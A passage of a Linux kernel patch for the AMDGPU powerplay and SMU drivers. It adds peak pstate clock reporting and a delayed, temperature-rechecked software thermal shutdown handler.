++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK:
++		*((uint32_t *)value) = hwmgr->pstate_mclk_peak * 100;
+ 		return 0;
+ 	case AMDGPU_PP_SENSOR_MIN_FAN_RPM:
+ 		*((uint32_t *)value) = hwmgr->thermal_controller.fanInfo.ulMinRPM;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
+index 981dc8c7112d6..90452b66e1071 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
+@@ -241,7 +241,8 @@ int phm_start_thermal_controller(struct pp_hwmgr *hwmgr)
+ 		TEMP_RANGE_MAX,
+ 		TEMP_RANGE_MIN,
+ 		TEMP_RANGE_MAX,
+-		TEMP_RANGE_MAX};
++		TEMP_RANGE_MAX,
++		0};
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 
+ 	if (!hwmgr->not_vf)
+@@ -265,6 +266,7 @@ int phm_start_thermal_controller(struct pp_hwmgr *hwmgr)
+ 	adev->pm.dpm.thermal.min_mem_temp = range.mem_min;
+ 	adev->pm.dpm.thermal.max_mem_crit_temp = range.mem_crit_max;
+ 	adev->pm.dpm.thermal.max_mem_emergency_temp = range.mem_emergency_max;
++	adev->pm.dpm.thermal.sw_ctf_threshold = range.sw_ctf_threshold;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+index ede71de2343dc..86d6e88c73862 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+@@ -375,6 +375,17 @@ static int smu10_enable_gfx_off(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
++static void smu10_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	hwmgr->pstate_sclk = SMU10_UMD_PSTATE_GFXCLK;
++	hwmgr->pstate_mclk = SMU10_UMD_PSTATE_FCLK;
++
++	smum_send_msg_to_smc(hwmgr,
++			     PPSMC_MSG_GetMaxGfxclkFrequency,
++			     &hwmgr->pstate_sclk_peak);
++	hwmgr->pstate_mclk_peak = SMU10_UMD_PSTATE_PEAK_FCLK;
++}
++
+ static int smu10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+@@ -398,6 +409,8 @@ static int smu10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 			return ret;
+ 	}
+ 
++	smu10_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -574,9 +587,6 @@ static int smu10_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
+ 
+-	hwmgr->pstate_sclk = SMU10_UMD_PSTATE_GFXCLK * 100;
+-	hwmgr->pstate_mclk = SMU10_UMD_PSTATE_FCLK * 100;
+-
+ 	/* enable the pp_od_clk_voltage sysfs file */
+ 	hwmgr->od_enabled = 1;
+ 	/* disabled fine grain tuning function by default */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 7ef7e81525a30..a31a62a1ce0b2 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -1501,6 +1501,67 @@ static int smu7_populate_edc_leakage_registers(struct pp_hwmgr *hwmgr)
+ 	return ret;
+ }
+ 
++static void smu7_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend);
++	struct smu7_dpm_table *golden_dpm_table = &data->golden_dpm_table;
++	int32_t tmp_sclk, count, percentage;
++
++	if (golden_dpm_table->mclk_table.count == 1) {
++		percentage = 70;
++		hwmgr->pstate_mclk = golden_dpm_table->mclk_table.dpm_levels[0].value;
++	} else {
++		percentage = 100 * golden_dpm_table->sclk_table.dpm_levels[golden_dpm_table->sclk_table.count - 1].value /
++				golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 1].value;
++		hwmgr->pstate_mclk = golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 2].value;
++	}
++
++	tmp_sclk = hwmgr->pstate_mclk * percentage / 100;
++
++	if (hwmgr->pp_table_version == PP_TABLE_V0) {
++		struct phm_clock_voltage_dependency_table *vddc_dependency_on_sclk =
++			hwmgr->dyn_state.vddc_dependency_on_sclk;
++
++		for (count = vddc_dependency_on_sclk->count - 1; count >= 0; count--) {
++			if (tmp_sclk >= vddc_dependency_on_sclk->entries[count].clk) {
++				hwmgr->pstate_sclk = vddc_dependency_on_sclk->entries[count].clk;
++				break;
++			}
++		}
++		if (count < 0)
++			hwmgr->pstate_sclk = vddc_dependency_on_sclk->entries[0].clk;
++
++		hwmgr->pstate_sclk_peak =
++			vddc_dependency_on_sclk->entries[vddc_dependency_on_sclk->count - 1].clk;
++	} else if (hwmgr->pp_table_version == PP_TABLE_V1) {
++		struct phm_ppt_v1_information *table_info =
++			(struct phm_ppt_v1_information *)(hwmgr->pptable);
++		struct phm_ppt_v1_clock_voltage_dependency_table *vdd_dep_on_sclk =
++			table_info->vdd_dep_on_sclk;
++
++		for (count = vdd_dep_on_sclk->count - 1; count >= 0; count--) {
++			if (tmp_sclk >= vdd_dep_on_sclk->entries[count].clk) {
++				hwmgr->pstate_sclk = vdd_dep_on_sclk->entries[count].clk;
++				break;
++			}
++		}
++		if (count < 0)
++			hwmgr->pstate_sclk = vdd_dep_on_sclk->entries[0].clk;
++
++		hwmgr->pstate_sclk_peak =
++			vdd_dep_on_sclk->entries[vdd_dep_on_sclk->count - 1].clk;
++	}
++
++	hwmgr->pstate_mclk_peak =
++		golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 1].value;
++
++	/* make sure the output is in Mhz */
++	hwmgr->pstate_sclk /= 100;
++	hwmgr->pstate_mclk /= 100;
++	hwmgr->pstate_sclk_peak /= 100;
++	hwmgr->pstate_mclk_peak /= 100;
++}
++
+ static int smu7_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	int tmp_result = 0;
+@@ -1625,6 +1686,8 @@ static int smu7_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	PP_ASSERT_WITH_CODE((0 == tmp_result),
+ 			"pcie performance request failed!", result = tmp_result);
+ 
++	smu7_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -3143,15 +3206,12 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 		for (count = hwmgr->dyn_state.vddc_dependency_on_sclk->count-1;
+ 			count >= 0; count--) {
+ 			if (tmp_sclk >= hwmgr->dyn_state.vddc_dependency_on_sclk->entries[count].clk) {
+-				tmp_sclk = hwmgr->dyn_state.vddc_dependency_on_sclk->entries[count].clk;
+ 				*sclk_mask = count;
+ 				break;
+ 			}
+ 		}
+-		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
++		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK)
+ 			*sclk_mask = 0;
+-			tmp_sclk = hwmgr->dyn_state.vddc_dependency_on_sclk->entries[0].clk;
+-		}
+ 
+ 		if (level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK)
+ 			*sclk_mask = hwmgr->dyn_state.vddc_dependency_on_sclk->count-1;
+@@ -3161,15 +3221,12 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 
+ 		for (count = table_info->vdd_dep_on_sclk->count-1; count >= 0; count--) {
+ 			if (tmp_sclk >= table_info->vdd_dep_on_sclk->entries[count].clk) {
+-				tmp_sclk = table_info->vdd_dep_on_sclk->entries[count].clk;
+ 				*sclk_mask = count;
+ 				break;
+ 			}
+ 		}
+-		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
++		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK)
+ 			*sclk_mask = 0;
+-			tmp_sclk =  table_info->vdd_dep_on_sclk->entries[0].clk;
+-		}
+ 
+ 		if (level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK)
+ 			*sclk_mask = table_info->vdd_dep_on_sclk->count - 1;
+@@ -3181,8 +3238,6 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 		*mclk_mask = golden_dpm_table->mclk_table.count - 1;
+ 
+ 	*pcie_mask = data->dpm_table.pcie_speed_table.count - 1;
+-	hwmgr->pstate_sclk = tmp_sclk;
+-	hwmgr->pstate_mclk = tmp_mclk;
+ 
+ 	return 0;
+ }
+@@ -3195,9 +3250,6 @@ static int smu7_force_dpm_level(struct pp_hwmgr *hwmgr,
+ 	uint32_t mclk_mask = 0;
+ 	uint32_t pcie_mask = 0;
+ 
+-	if (hwmgr->pstate_sclk == 0)
+-		smu7_get_profiling_clk(hwmgr, level, &sclk_mask, &mclk_mask, &pcie_mask);
+-
+ 	switch (level) {
+ 	case AMD_DPM_FORCED_LEVEL_HIGH:
+ 		ret = smu7_force_dpm_highest(hwmgr);
+@@ -5381,6 +5433,8 @@ static int smu7_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		thermal_data->max = data->thermal_temp_setting.temperature_shutdown *
+ 			PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
++	thermal_data->sw_ctf_threshold = thermal_data->max;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index b50fd4a4a3d1a..b015a601b385a 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -1016,6 +1016,18 @@ static void smu8_reset_acp_boot_level(struct pp_hwmgr *hwmgr)
+ 	data->acp_boot_level = 0xff;
+ }
+ 
++static void smu8_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct phm_clock_voltage_dependency_table *table =
++				hwmgr->dyn_state.vddc_dependency_on_sclk;
++
++	hwmgr->pstate_sclk = table->entries[0].clk / 100;
++	hwmgr->pstate_mclk = 0;
++
++	hwmgr->pstate_sclk_peak = table->entries[table->count - 1].clk / 100;
++	hwmgr->pstate_mclk_peak = 0;
++}
++
+ static int smu8_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	smu8_program_voting_clients(hwmgr);
+@@ -1024,6 +1036,8 @@ static int smu8_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	smu8_program_bootup_state(hwmgr);
+ 	smu8_reset_acp_boot_level(hwmgr);
+ 
++	smu8_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -1167,8 +1181,6 @@ static int smu8_phm_unforce_dpm_levels(struct pp_hwmgr *hwmgr)
+ 
+ 	data->sclk_dpm.soft_min_clk = table->entries[0].clk;
+ 	data->sclk_dpm.hard_min_clk = table->entries[0].clk;
+-	hwmgr->pstate_sclk = table->entries[0].clk;
+-	hwmgr->pstate_mclk = 0;
+ 
+ 	level = smu8_get_max_sclk_level(hwmgr) - 1;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
+index bfe80ac0ad8c8..d0b1ab6c45231 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
+@@ -603,21 +603,17 @@ int phm_irq_process(struct amdgpu_device *adev,
+ 			   struct amdgpu_irq_src *source,
+ 			   struct amdgpu_iv_entry *entry)
+ {
++	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 	uint32_t client_id = entry->client_id;
+ 	uint32_t src_id = entry->src_id;
+ 
+ 	if (client_id == AMDGPU_IRQ_CLIENTID_LEGACY) {
+ 		if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_LOW_TO_HIGH) {
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
+-		} else if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_HIGH_TO_LOW)
++			schedule_delayed_work(&hwmgr->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
++		} else if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_HIGH_TO_LOW) {
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected!\n");
+-		else if (src_id == VISLANDS30_IV_SRCID_GPIO_19) {
++		} else if (src_id == VISLANDS30_IV_SRCID_GPIO_19) {
+ 			dev_emerg(adev->dev, "ERROR: GPU HW Critical Temperature Fault(aka CTF) detected!\n");
+ 			/*
+ 			 * HW CTF just occurred. Shutdown to prevent further damage.
+@@ -626,15 +622,10 @@ int phm_irq_process(struct amdgpu_device *adev,
+ 			orderly_poweroff(true);
+ 		}
+ 	} else if (client_id == SOC15_IH_CLIENTID_THM) {
+-		if (src_id == 0) {
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
+-		} else
++		if (src_id == 0)
++			schedule_delayed_work(&hwmgr->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
++		else
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected!\n");
+ 	} else if (client_id == SOC15_IH_CLIENTID_ROM_SMUIO) {
+ 		dev_emerg(adev->dev, "ERROR: GPU HW Critical Temperature Fault(aka CTF) detected!\n");
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index c8c9fb827bda1..d8cd23438b762 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -3008,6 +3008,30 @@ static int vega10_enable_disable_PCC_limit_feature(struct pp_hwmgr *hwmgr, bool
+ 	return 0;
+ }
+ 
++static void vega10_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct phm_ppt_v2_information *table_info =
++			(struct phm_ppt_v2_information *)(hwmgr->pptable);
++
++	if (table_info->vdd_dep_on_sclk->count > VEGA10_UMD_PSTATE_GFXCLK_LEVEL &&
++	    table_info->vdd_dep_on_mclk->count > VEGA10_UMD_PSTATE_MCLK_LEVEL) {
++		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[VEGA10_UMD_PSTATE_GFXCLK_LEVEL].clk;
++		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[VEGA10_UMD_PSTATE_MCLK_LEVEL].clk;
++	} else {
++		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[0].clk;
++		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[0].clk;
++	}
++
++	hwmgr->pstate_sclk_peak = table_info->vdd_dep_on_sclk->entries[table_info->vdd_dep_on_sclk->count - 1].clk;
++	hwmgr->pstate_mclk_peak = table_info->vdd_dep_on_mclk->entries[table_info->vdd_dep_on_mclk->count - 1].clk;
++
++	/* make sure the output is in Mhz */
++	hwmgr->pstate_sclk /= 100;
++	hwmgr->pstate_mclk /= 100;
++	hwmgr->pstate_sclk_peak /= 100;
++	hwmgr->pstate_mclk_peak /= 100;
++}
++
+ static int vega10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+@@ -3082,6 +3106,8 @@ static int vega10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 				    result = tmp_result);
+ 	}
+ 
++	vega10_populate_umdpstate_clocks(hwmgr);
++
+ 	return result;
+ }
+ 
+@@ -4169,8 +4195,6 @@ static int vega10_get_profiling_clk_mask(struct pp_hwmgr *hwmgr, enum amd_dpm_fo
+ 		*sclk_mask = VEGA10_UMD_PSTATE_GFXCLK_LEVEL;
+ 		*soc_mask = VEGA10_UMD_PSTATE_SOCCLK_LEVEL;
+ 		*mclk_mask = VEGA10_UMD_PSTATE_MCLK_LEVEL;
+-		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[VEGA10_UMD_PSTATE_GFXCLK_LEVEL].clk;
+-		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[VEGA10_UMD_PSTATE_MCLK_LEVEL].clk;
+ 	}
+ 
+ 	if (level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
+@@ -4281,9 +4305,6 @@ static int vega10_dpm_force_dpm_level(struct pp_hwmgr *hwmgr,
+ 	uint32_t mclk_mask = 0;
+ 	uint32_t soc_mask = 0;
+ 
+-	if (hwmgr->pstate_sclk == 0)
+-		vega10_get_profiling_clk_mask(hwmgr, level, &sclk_mask, &mclk_mask, &soc_mask);
+-
+ 	switch (level) {
+ 	case AMD_DPM_FORCED_LEVEL_HIGH:
+ 		ret = vega10_force_dpm_highest(hwmgr);
+@@ -5221,6 +5242,9 @@ static int vega10_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
++	struct phm_ppt_v2_information *pp_table_info =
++		(struct phm_ppt_v2_information *)(hwmgr->pptable);
++	struct phm_tdp_table *tdp_table = pp_table_info->tdp_table;
+ 
+ 	memcpy(thermal_data, &SMU7ThermalWithDelayPolicy[0], sizeof(struct PP_TemperatureRange));
+ 
+@@ -5237,6 +5261,13 @@ static int vega10_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
++	if (tdp_table->usSoftwareShutdownTemp > pp_table->ThotspotLimit &&
++	    tdp_table->usSoftwareShutdownTemp < VEGA10_THERMAL_MAXIMUM_ALERT_TEMP)
++		thermal_data->sw_ctf_threshold = tdp_table->usSoftwareShutdownTemp;
++	else
++		thermal_data->sw_ctf_threshold = VEGA10_THERMAL_MAXIMUM_ALERT_TEMP;
++	thermal_data->sw_ctf_threshold *= PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+index a2f4d6773d458..1069eaaae2f82 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+@@ -1026,6 +1026,25 @@ static int vega12_get_all_clock_ranges(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
++static void vega12_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct vega12_hwmgr *data = (struct vega12_hwmgr *)(hwmgr->backend);
++	struct vega12_single_dpm_table *gfx_dpm_table = &(data->dpm_table.gfx_table);
++	struct vega12_single_dpm_table *mem_dpm_table = &(data->dpm_table.mem_table);
++
++	if (gfx_dpm_table->count > VEGA12_UMD_PSTATE_GFXCLK_LEVEL &&
++	    mem_dpm_table->count > VEGA12_UMD_PSTATE_MCLK_LEVEL) {
++		hwmgr->pstate_sclk = gfx_dpm_table->dpm_levels[VEGA12_UMD_PSTATE_GFXCLK_LEVEL].value;
++		hwmgr->pstate_mclk = mem_dpm_table->dpm_levels[VEGA12_UMD_PSTATE_MCLK_LEVEL].value;
++	} else {
++		hwmgr->pstate_sclk = gfx_dpm_table->dpm_levels[0].value;
++		hwmgr->pstate_mclk = mem_dpm_table->dpm_levels[0].value;
++	}
++
++	hwmgr->pstate_sclk_peak = gfx_dpm_table->dpm_levels[gfx_dpm_table->count].value;
++	hwmgr->pstate_mclk_peak = mem_dpm_table->dpm_levels[mem_dpm_table->count].value;
++}
++
+ static int vega12_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	int tmp_result, result = 0;
+@@ -1077,6 +1096,9 @@ static int vega12_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	PP_ASSERT_WITH_CODE(!result,
+ 			"Failed to setup default DPM tables!",
+ 			return result);
++
++	vega12_populate_umdpstate_clocks(hwmgr);
++
+ 	return result;
+ }
+ 
+@@ -2742,6 +2764,8 @@ static int vega12_notify_cac_buffer_info(struct pp_hwmgr *hwmgr,
+ static int vega12_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		struct PP_TemperatureRange *thermal_data)
+ {
++	struct phm_ppt_v3_information *pptable_information =
++		(struct phm_ppt_v3_information *)hwmgr->pptable;
+ 	struct vega12_hwmgr *data =
+ 			(struct vega12_hwmgr *)(hwmgr->backend);
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
+@@ -2760,6 +2784,8 @@ static int vega12_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++	thermal_data->sw_ctf_threshold = pptable_information->us_software_shutdown_temp *
++		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index b30684c84e20e..ff77a3683efd5 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -1555,26 +1555,23 @@ static int vega20_set_mclk_od(
+ 	return 0;
+ }
+ 
+-static int vega20_populate_umdpstate_clocks(
+-		struct pp_hwmgr *hwmgr)
++static void vega20_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data = (struct vega20_hwmgr *)(hwmgr->backend);
+ 	struct vega20_single_dpm_table *gfx_table = &(data->dpm_table.gfx_table);
+ 	struct vega20_single_dpm_table *mem_table = &(data->dpm_table.mem_table);
+ 
+-	hwmgr->pstate_sclk = gfx_table->dpm_levels[0].value;
+-	hwmgr->pstate_mclk = mem_table->dpm_levels[0].value;
+-
+ 	if (gfx_table->count > VEGA20_UMD_PSTATE_GFXCLK_LEVEL &&
+ 	    mem_table->count > VEGA20_UMD_PSTATE_MCLK_LEVEL) {
+ 		hwmgr->pstate_sclk = gfx_table->dpm_levels[VEGA20_UMD_PSTATE_GFXCLK_LEVEL].value;
+ 		hwmgr->pstate_mclk = mem_table->dpm_levels[VEGA20_UMD_PSTATE_MCLK_LEVEL].value;
++	} else {
++		hwmgr->pstate_sclk = gfx_table->dpm_levels[0].value;
++		hwmgr->pstate_mclk = mem_table->dpm_levels[0].value;
+ 	}
+ 
+-	hwmgr->pstate_sclk = hwmgr->pstate_sclk * 100;
+-	hwmgr->pstate_mclk = hwmgr->pstate_mclk * 100;
+-
+-	return 0;
++	hwmgr->pstate_sclk_peak = gfx_table->dpm_levels[gfx_table->count - 1].value;
++	hwmgr->pstate_mclk_peak = mem_table->dpm_levels[mem_table->count - 1].value;
+ }
+ 
+ static int vega20_get_max_sustainable_clock(struct pp_hwmgr *hwmgr,
+@@ -1753,10 +1750,7 @@ static int vega20_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 			"[EnableDPMTasks] Failed to initialize odn settings!",
+ 			return result);
+ 
+-	result = vega20_populate_umdpstate_clocks(hwmgr);
+-	PP_ASSERT_WITH_CODE(!result,
+-			"[EnableDPMTasks] Failed to populate umdpstate clocks!",
+-			return result);
++	vega20_populate_umdpstate_clocks(hwmgr);
+ 
+ 	result = smum_send_msg_to_smc_with_parameter(hwmgr, PPSMC_MSG_GetPptLimit,
+ 			POWER_SOURCE_AC << 16, &hwmgr->default_power_limit);
+@@ -4213,6 +4207,8 @@ static int vega20_notify_cac_buffer_info(struct pp_hwmgr *hwmgr,
+ static int vega20_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		struct PP_TemperatureRange *thermal_data)
+ {
++	struct phm_ppt_v3_information *pptable_information =
++		(struct phm_ppt_v3_information *)hwmgr->pptable;
+ 	struct vega20_hwmgr *data =
+ 			(struct vega20_hwmgr *)(hwmgr->backend);
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
+@@ -4231,6 +4227,8 @@ static int vega20_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++	thermal_data->sw_ctf_threshold = pptable_information->us_software_shutdown_temp *
++		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h b/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
+index 27f8d0e0e6a8c..ec10643edea3e 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
+@@ -809,6 +809,10 @@ struct pp_hwmgr {
+ 	uint32_t workload_prority[Workload_Policy_Max];
+ 	uint32_t workload_setting[Workload_Policy_Max];
+ 	bool gfxoff_state_changed_by_workload;
++	uint32_t pstate_sclk_peak;
++	uint32_t pstate_mclk_peak;
++
++	struct delayed_work swctf_delayed_work;
+ };
+ 
+ int hwmgr_early_init(struct pp_hwmgr *hwmgr);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h b/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
+index a5f2227a3971c..0ffc2347829d0 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
+@@ -131,6 +131,7 @@ struct PP_TemperatureRange {
+ 	int mem_min;
+ 	int mem_crit_max;
+ 	int mem_emergency_max;
++	int sw_ctf_threshold;
+ };
+ 
+ struct PP_StateValidationBlock {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 91dfc229e34d7..d191ff52d4f06 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -24,6 +24,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/pci.h>
++#include <linux/reboot.h>
+ 
+ #include "amdgpu.h"
+ #include "amdgpu_smu.h"
+@@ -1061,6 +1062,34 @@ static void smu_interrupt_work_fn(struct work_struct *work)
+ 		smu->ppt_funcs->interrupt_work(smu);
+ }
+ 
++static void smu_swctf_delayed_work_handler(struct work_struct *work)
++{
++	struct smu_context *smu =
++		container_of(work, struct smu_context, swctf_delayed_work.work);
++	struct smu_temperature_range *range =
++				&smu->thermal_range;
++	struct amdgpu_device *adev = smu->adev;
++	uint32_t hotspot_tmp, size;
++
++	/*
++	 * If the hotspot temperature is confirmed as below SW CTF setting point
++	 * after the delay enforced, nothing will be done.
++	 * Otherwise, a graceful shutdown will be performed to prevent further damage.
++	 */
++	if (range->software_shutdown_temp &&
++	    smu->ppt_funcs->read_sensor &&
++	    !smu->ppt_funcs->read_sensor(smu,
++					 AMDGPU_PP_SENSOR_HOTSPOT_TEMP,
++					 &hotspot_tmp,
++					 &size) &&
++	    hotspot_tmp / 1000 < range->software_shutdown_temp)
++		return;
++
++	dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
++	dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
++	orderly_poweroff(true);
++}
++
+ static int smu_sw_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1109,6 +1138,9 @@ static int smu_sw_init(void *handle)
+ 		return ret;
+ 	}
